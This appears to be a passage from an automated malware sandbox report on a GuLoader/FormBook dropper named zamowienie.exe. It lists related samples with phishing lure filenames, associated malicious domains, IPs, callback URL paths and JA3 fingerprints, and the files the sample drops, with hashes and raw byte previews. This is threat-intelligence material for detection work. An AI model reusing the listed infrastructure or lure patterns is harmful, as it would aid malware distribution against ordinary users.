                                                                                                                      3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.invicta.world/0cd8/
                                                                                                                      RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.invicta.world/0cd8/
                                                                                                                      ROQ_972923.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.catholic.today/1u6c/
                                                                                                                      PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.catholic.today/gs9g/
                                                                                                                      195.110.124.133TT Swift copy1.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.nidedabeille.net/oy0l/
                                                                                                                      rHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.hentaistgma.net/qhr1/
                                                                                                                      Request for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                      • www.nidedabeille.net/l6bs/
                                                                                                                      Hesap-hareketleriniz10-15-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.bluegirls.blog/cejh/
                                                                                                                      3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.trisixnine.net/x0wm/
                                                                                                                      Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.bluegirls.blog/cejh/
                                                                                                                      RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.trisixnine.net/x0wm/
                                                                                                                      IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.hentaistgma.net/8ouq/
                                                                                                                      rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • www.nidedabeille.net/qwre/
                                                                                                                      PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.hentaistgma.net/00ob/
                                                                                                                      185.17.43.223Bestellung.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                        Bestellung_101624.vbsGet hashmaliciousGuLoaderBrowse

                                                                                                                          Domains

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          www.svarus.online10145202485.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                          • 194.58.112.174
                                                                                                                          kambud.bizBestellung.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                          • 185.17.43.223
                                                                                                                          Bestellung_101624.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                          • 185.17.43.223
                                                                                                                          www.newhopetoday.app10145202485.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                          • 216.40.34.41
                                                                                                                          www.3808.apprequest-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                          • 13.248.169.48
                                                                                                                          NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 13.248.169.48

                                                                                                                          ASNs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          REGISTER-ASITTT Swift copy1.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 195.110.124.133
                                                                                                                          rHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 195.110.124.133
                                                                                                                          Request for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • 195.110.124.133
                                                                                                                          http://evriservicescompany.com/Get hashmaliciousUnknownBrowse
                                                                                                                          • 81.88.58.193
                                                                                                                          Hesap-hareketleriniz10-15-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 195.110.124.133
                                                                                                                          NjjLYnPSZr.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 81.88.48.71
                                                                                                                          3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 195.110.124.133
                                                                                                                          Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 195.110.124.133
                                                                                                                          RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 195.110.124.133
                                                                                                                          sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 195.110.124.133
                                                                                                                          ARTNETPLBestellung.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                          • 185.17.43.223
                                                                                                                          Bestellung_101624.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                          • 185.17.43.223
                                                                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                                                                          • 37.28.157.3
                                                                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                                                                          • 37.28.157.3
                                                                                                                          t3ttQtxRbr.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 213.192.111.229
                                                                                                                          tFvJNNr418.exeGet hashmaliciousStealcBrowse
                                                                                                                          • 185.17.40.133
                                                                                                                          Cash_Transfer_REF#23284449-9374647.jsGet hashmaliciousWSHRat, XWormBrowse
                                                                                                                          • 194.15.216.233
                                                                                                                          file.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                          • 194.15.216.72
                                                                                                                          rMCvpX90mR.exeGet hashmaliciousMetasploitBrowse
                                                                                                                          • 5.133.9.52
                                                                                                                          AMAZON-02USRechnung 22. Okt. 2024.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 76.76.21.93
                                                                                                                          articulate-360.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 108.138.7.72
                                                                                                                          https://warriorplus.com/o2/a/jxwtscv/0Get hashmaliciousUnknownBrowse
                                                                                                                          • 18.245.31.42
                                                                                                                          bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 76.223.67.189
                                                                                                                          https://freeaccessonline.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                                                                                          • 52.84.150.39
                                                                                                                          PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                          • 13.248.169.48
                                                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                          • 13.32.99.17
                                                                                                                          la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 52.40.53.215
                                                                                                                          la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 18.243.123.69
                                                                                                                          bin.x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                          • 52.46.196.110
                                                                                                                          BODIS-NJUSPO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                          • 199.59.243.227
                                                                                                                          rHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 199.59.243.227
                                                                                                                          Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 199.59.243.227
                                                                                                                          Re property pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 199.59.243.227
                                                                                                                          #U8a02#U55ae#U63cf#U8ff0.vbsGet hashmaliciousFormBookBrowse
                                                                                                                          • 199.59.243.227
                                                                                                                          Document.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 199.59.243.227
                                                                                                                          jOAcln1aPL.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 199.59.243.227
                                                                                                                          jOAcln1aPL.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 199.59.243.227
                                                                                                                          890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                          • 199.59.243.227
                                                                                                                          na.htaGet hashmaliciousCobalt Strike, FormBook, GuLoaderBrowse
                                                                                                                          • 199.59.243.227

                                                                                                                          JA3 Fingerprints

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          37f463bf4616ecd445d4a1937da06e19LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                          • 185.17.43.223
                                                                                                                          TicariXHesapXXzetiniz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 185.17.43.223
                                                                                                                          MDE_File_Sample_1a8e4ebbcc2e3f76efb2a55bb6179417263ebf3d.zipGet hashmaliciousUnknownBrowse
                                                                                                                          • 185.17.43.223
                                                                                                                          rEXSP5634HISP9005STMSDSDOKUME74247linierelet.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                          • 185.17.43.223
                                                                                                                          Reminder.exeGet hashmaliciousAmadeyBrowse
                                                                                                                          • 185.17.43.223
                                                                                                                          P4.exeGet hashmaliciousXRedBrowse
                                                                                                                          • 185.17.43.223
                                                                                                                          Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                          • 185.17.43.223
                                                                                                                          Salary Revision_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                          • 185.17.43.223
                                                                                                                          Scanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                          • 185.17.43.223

                                                                                                                          Dropped Files

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          C:\Users\user\AppData\Local\Temp\nsz31BB.tmp\System.dllHJEbEB40vP.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            HJEbEB40vP.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              Udspecialiser45.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                Botulismus56.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  Hebdomcad.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    Udspecialiser45.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      Hebdomcad.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                        Botulismus56.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                          004552024107.bat.exeGet hashmaliciousGuLoaderBrowse

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\ProgramData\Microsoft\Windows\Start Menu\eksportafgrde.ini

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):38
                                                                                                                                            Entropy (8bit):4.240962710641208
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:XBjBc3PEf0OAky:W88vky
                                                                                                                                            MD5:A0D91A2F9ACB4DEC3B5260ABA27839C4
                                                                                                                                            SHA1:8A9037C691A2BDEEBCAB8BF3D4C954E62ACA9207
                                                                                                                                            SHA-256:773CD6FBA7D53550B4C41AA889E330B744A7A579DF2BB02212773B67E72F5844
                                                                                                                                            SHA-512:D3DF7852AEA197E901C787CD8D943FAAA30EE9A6678C4853ED0BB494679897854E4E7556F420F1C176443A485CF1E02E0B4BFF86F8DA4017A053362B2C9A0608
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:[Landslide]..conduits=jazzorkesteret..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\02-E8420l

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\verclsid.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):196608
                                                                                                                                            Entropy (8bit):1.121297215059106
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsa2863.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2753129
                                                                                                                                            Entropy (8bit):2.331545552838218
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:Zo4i+RNMONxD8JxqR+UfGn3X8TEN8NdMk8yPAudY6ku1v39LH+FrA7jiwVoxTQG7:7BkdcGn6ENcVVlY+1eMKFQClJRj4e
                                                                                                                                            MD5:EAA864507F12C17D24AA61C6878628DE
                                                                                                                                            SHA1:7A37435E42CE441E45C409E2CBC12A5BA3E50F7F
                                                                                                                                            SHA-256:9ABD825EE8A302DD1A5EE8FA8B70CEA24B15AB8224115EB2333F819F4318F1EB
                                                                                                                                            SHA-512:221CA014348DE8D5914C3CBFF8AC94660E8FC48EED455730109C74A0F6C6604E94A4D66E5FF30CC0F8655EAF97AF9670B87B262C41BC8A512089F63F06145DB2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:;<......,.......,.......\........).......:.......;..........................................................................................................................................................................................................................................J...c...........%...h...............................................................g...............................................................j...........................................................................................................................................z...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsz31BB.tmp\System.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12288
                                                                                                                                            Entropy (8bit):5.744994954995265
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:gFiQJ77pJp17C8F1A5xjGNxrgFOgb7lrT/nC93:E7pJp48F2exrg5F/C
                                                                                                                                            MD5:12B140583E3273EE1F65016BECEA58C4
                                                                                                                                            SHA1:92DF24D11797FEFD2E1F8D29BE9DFD67C56C1ADA
                                                                                                                                            SHA-256:014F1DFEB842CF7265A3644BC6903C592ABE9049BFC7396829172D3D72C4D042
                                                                                                                                            SHA-512:49FFDFA1941361430B6ACB3555FD3AA05E4120F28CBDF7CEAA2AF5937D0B8CCCD84471CF63F06F97CF203B4AA20F226BDAD082E9421B8E6B62AB6E1E9FC1E68A
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: HJEbEB40vP.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: HJEbEB40vP.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Udspecialiser45.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Botulismus56.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Hebdomcad.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Udspecialiser45.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Hebdomcad.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Botulismus56.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....C.f...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...h....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218\Alaruming.non

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):337930
                                                                                                                                            Entropy (8bit):1.25188824584269
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:hJMwrC9wmaLL8pC4j2hVlttk0orKQD2tutLZ6x/FpL/78Z9UeF2uzUrLMZmJw2ev:tBViuRS6HyF8/vBo+9L/v5s
                                                                                                                                            MD5:C6D1C2BE55D88953114534B2C3414FCE
                                                                                                                                            SHA1:4CE94B31CE73032CF27185052078645BF0AE3150
                                                                                                                                            SHA-256:2CAAE3F8077BF3A599CA5F8CE790CB1CE8E5DFCDC85F9D355D24A767C05DC21C
                                                                                                                                            SHA-512:B404301D95A3BB60D59483A596B38B9E1D02DCA69B4FAC424A33D316F077A1D55D2A45BC3D298E063E0F2D10ADF7F1F38E4202382B69CF3CB57F9CFD1007C300
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.........................................L.........................$..........................................W............................P..7.............p.............................%............-............L.................................+.....................................n...f...........O.....................I.............................2...............................................w..........................................................................................................................................................................!..............................................R....................................Z.........................m....................................................................................k.........................................&....................7.....K....I.................'.......................P....E.........;.....................................................l....i...........................................

                                                                                                                                            C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218\Sengehestes.Ave

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):102287
                                                                                                                                            Entropy (8bit):4.602402179232247
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:m6JZRAi/JRATh3qtEptdq3VIf31jdIXUM9CmO1k6c/h:ZrAMJRATsYtdiwVoh
                                                                                                                                            MD5:C55446B1BF3CC22503E46F1E6E45347D
                                                                                                                                            SHA1:7AB3F441EC208BD5B4CD2AEEBB63012CC91CF55C
                                                                                                                                            SHA-256:EB2BB2F8FF36504CD79F6DE36F638B31A0BB23A7F1B4D3A1647386CD1063891D
                                                                                                                                            SHA-512:B4477CA107ABD7D76DBFDEA265DF666CF8C8D3033A21FA99E15BFFF71C82C446C428F39089B61BDE4338161611B2A8AAE3E4636DFE59DA315CF423FEFEF3DD3F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:............bb........3......*................z..aa........E...........C.......u..((((......E.......VVVV.GGG................k..............t...............QQ.........>>..........y..!....___........N..[[[[..pp.......Y..............RR..V.jjj....$.....................\.........................D........................VV..H................####...........y.............L...*..............cc..............r.....GG.??.........}}.....0........................................V.CC........J...................333."...f.........p.......LL.1....K..............???.3.........ii....r....VVVVV..........jj...........................````...................."........$........................cc.2......................C..................................XXX......NNNNN......J........Q........111................wwww....|..................................................FFF.....b.....+.M..............H....dd.....#.....0.......!!!...............................7..33.......c.GGGGG..y.....QQQ.............s....-...SS.

                                                                                                                                            C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218\Tilfredshederne.bjr

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):288628
                                                                                                                                            Entropy (8bit):1.2566116974289765
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:WQPHdCHjQjfdirwUixgOmEojE3vgFsZYfeWnfYaHKzalU3B0NyxyJe5d5kvliu0l:RATSyUPyIYQ32kMXmfx
                                                                                                                                            MD5:B2C941D872423FC08B9A939082E1DBDB
                                                                                                                                            SHA1:8E0AAF70970B0E52EF62E7DC5A487388C2FD498C
                                                                                                                                            SHA-256:C80487F3C9A8680862E5C671A2963952708C1C9DA652C4A6FEC0D0FE08FBEF80
                                                                                                                                            SHA-512:42D91AB1B9EA30CEDE236E78958005970E49279E3A57088F13CDD5B5F95AD1819F3E1E9E60B48363C9FE9B694DA02927DEFFC5DAA9040DBCA80A10F2B2589862
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....+]......................4................................................................................d.....................p................................K........................................+..........................T................................................J..........................................|...................:V............................................................................................................=.........Z.............................?............................[........................................X.)..N.........!.H.....................................................................................................#..................................................~............................................................a............h...................................................................................l.........Y..........5........../............N...............N.............z............Z......@...........

                                                                                                                                            C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218\Udskyder.Fue

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):273163
                                                                                                                                            Entropy (8bit):7.726230579771076
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:mMONxD8JxqR+UfGn3X8TEN8NdMk8yPAudYL:ykdcGn6ENcVVlYL
                                                                                                                                            MD5:EFFDB1201D3175E286C09DE584BD3869
                                                                                                                                            SHA1:03E0C734BC3F679698AB7E22ABA75AE0ABEB4907
                                                                                                                                            SHA-256:4A91016FCAEF3FCED70DF3A64C81EEEF5D6B4103AE1A72E052209BE0E4BEBD3A
                                                                                                                                            SHA-512:0E73339CF2782058576127F0FFBFA47301C40DC3DD02B8D66B36E3849BF0821B02F89FA854E86A99F212CC418EDC9F6D9579EE9DB226A888C695590E086E5949
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......<........zz.........................z..........................3.....z...........777777.y...........4......S......................<..........................E..............)........................................N.....;.7...................................99.yyy....EEE.-.............@............0...............888................................................>...................V..GG.(.ppppp....lllll............XX.TT..NNNNN.....DDDDDD......VVV....g........YYYYYYY..g. .../...rr.kk........EE...|...fff.aaa..........................MMM...FF..q...........hh.....RR....%.K...........ss......###.............f......+...W....d.....MMMM...GG.......''''........V...........................888...........,,,.?....R.22222.......#....I......jjj.............)....................g..........................................55.....I..................................8....cc.............}}.....T......cc.....(..........w...www.......1...............>............gg...................q....gg..'.].....

                                                                                                                                            C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218\frlighed.app

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):259685
                                                                                                                                            Entropy (8bit):1.2400438107539822
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:cA1hV6OhcgJ9H+VkvR1iNrNFhFO3S3nRyyFCHNDhzPZZKCVDz7nLZEXYHF5VFYao:bu4R0PIXFl5tpxiHqGgg
                                                                                                                                            MD5:DF7575B0A922EB9254C2FD55589079B5
                                                                                                                                            SHA1:48E2566AB591EE6BC5715F8F38D834D9742A976C
                                                                                                                                            SHA-256:94D26D3C091C937F49C5E8A4822703C79C4B41182210DAA4A9672F446BD7FFCC
                                                                                                                                            SHA-512:41CB5A47835FE8198D6A793CBDB1F01C5420C89FB7854975CC9AA678B990B4C2AD1E3541C0212ED09413C6AC402AABCE37D82595913D6D4759CEC0752F889CD9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.......................O....................................................................................F....................................5........................................B...............................................................h..............^..3......................................................................>...............h.................................................................................................V.................................1.................0..............................A....................................|......*.................p.................E........................................................................................................N.......................................................i...................|.........................................................................................+.................................................,...............................................G..............

                                                                                                                                            C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218\garran.bes

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):440119
                                                                                                                                            Entropy (8bit):1.2627229150298473
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:Pc0CNJubDNkJcJTg5nvTxtqx/uvk92q0:2WNkqJTCvTI0kV
                                                                                                                                            MD5:D5EBCE57E1D1D9263FC83E5AAE05A4A2
                                                                                                                                            SHA1:9823E2CBD8EC9C67620B1852DCE565E749A2332B
                                                                                                                                            SHA-256:7AA6A6E87EFFAF70C1091FA64DC6E513DFEED53E299DE8439596BE9A68411BF8
                                                                                                                                            SHA-512:ADDB94222D46A1631816DC5B583C9B1CB1AEA6BEA57E6D6A2341DF7FE5C22CC87CF167EA18CFDE25260A42B930389B9DA3499B344F071F3F8E3900774CD01008
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..........`..............B.............R...............................................................E..........I..........................................................:............................I....l.........................................................................~...................Ej.......d..t......................................."...............h.........................................%............................|....................................................O.....F..w..........}.............................[......................t.....n.U..............l.......7.....................................j.........................V..................................I.......t........,.......B.........^................................r.............../........?...e...............n....q.......................................i.............................................................................g..........?........................................................

                                                                                                                                            C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218\rensdyrmossers.pro

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):314929
                                                                                                                                            Entropy (8bit):1.250025321927161
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:oBwt8US5+D9XpKLvU4/YzSg+Od2T5JufC6Ipuf5RKvOT5kMfA71lqBq1QaOWAge5:Wy7IYDSPR7VUxeA
                                                                                                                                            MD5:29C3C147CD963631AA9C52024A042309
                                                                                                                                            SHA1:F667FEAED1C0F49314CA68E4E68D634F34D18348
                                                                                                                                            SHA-256:C3C7B18682AEAE9ED4CDF40F8EC4FC2A128F034EE96737DA1D763755AAEFC249
                                                                                                                                            SHA-512:F26CE22F6057877F16738272E4E2D934A9A9F0AD1DC153ACF0AA1252EA86DA028BE27D4535E741F69F84544A8E58218FBE5B840F7148888DC3C37F6689A28D4D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...&.................................................Oe..................................B..X.................!.......................................................... .......................................................................X4.....................N........n...............................\...'...........................{............................................................................................X........................................................................................U.....................................?........................Q..........t.................q.......>.............................................t.........i................................J%...V.....%..........................................1.....................................................N......................................................~...............................n....J..............P...............................................................I...........

                                                                                                                                            C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218\sodomitternes.dif

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):322200
                                                                                                                                            Entropy (8bit):1.2423405868446242
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:yNzqAluqE73OpE8nzxJ0abXyz639Xlv/qBWpFE7FIfyvwz6rW4TmhA0gXQUehsG1:Ysauwllgvr+1Q2ROSRxQ4P
                                                                                                                                            MD5:EE612E81775E0F972E97D6DF0AEA0069
                                                                                                                                            SHA1:8DD3AB1FDB01F14FF70D52E4C72129516F06CBDD
                                                                                                                                            SHA-256:ECA6AC6498377C0CDA20C322E5F5C6BDCE2970E9322E0E0C175645F1EE1C71DE
                                                                                                                                            SHA-512:4EA48619ABF3F67AF06CF662B6EC28DBFAF24A4425EC7FDB70BDFFAE06AFB409D47755A1A9B6C93A74CC3C2C3B874388A9130D4764C225E6AB6C198936BB5B22
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....;................................................................................)...P.............;........e.1......P.....Y........................_.................k'..........................J2.......<.................h..........................................................................................6.....................................j.......................................................>..............%...............................................................................................................Q.......f.......F..............................Y.E........b..............?......................Y@..4........................................m..................z...................................#................................y...................................................s.........................d.....................................................................................................................................b.....................

                                                                                                                                            C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218\subhyaloid.shi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):385976
                                                                                                                                            Entropy (8bit):1.244155886205187
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:LyAGtdTW/3IAy+unM7Byvu6C7JYtzlS70QpHRNXvCp8mkXhUOFttrIMDMiE3CblT:qioDZWJAT4WMrLNRoNSyYpH
                                                                                                                                            MD5:1ACF5662CECA662D7ABCA1BAC4AF2D93
                                                                                                                                            SHA1:984F9C01EEC648BBC93ED852994ACA226AFC62FE
                                                                                                                                            SHA-256:829932E0769F886E2E42E2EEC4C758563410BD69527783100E8DA449C4DC4399
                                                                                                                                            SHA-512:0EF38CA57779E91E14B2481850C865B7D723DB31BE408F6E3F055D9FF462B9C1383AEA1FCAD6165C7E630CA9B9CFFF62F76280D6CF5B5A1DC5217906C9881736
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..........................................".....................................................................Vfk...........:0....................................................X......y...%....................................+.....................8................................................................J...................P.......................................................:.......m................................................2.............!......O.....................................................................8...........................................B................{.................................................................................................................k..........................t..............................D....................................................................................................................8.........O........................................3..............%......6..#...........................3.c...y

                                                                                                                                            C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218\traveri.txt

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):422
                                                                                                                                            Entropy (8bit):4.216384920844683
                                                                                                                                            Encrypted:false
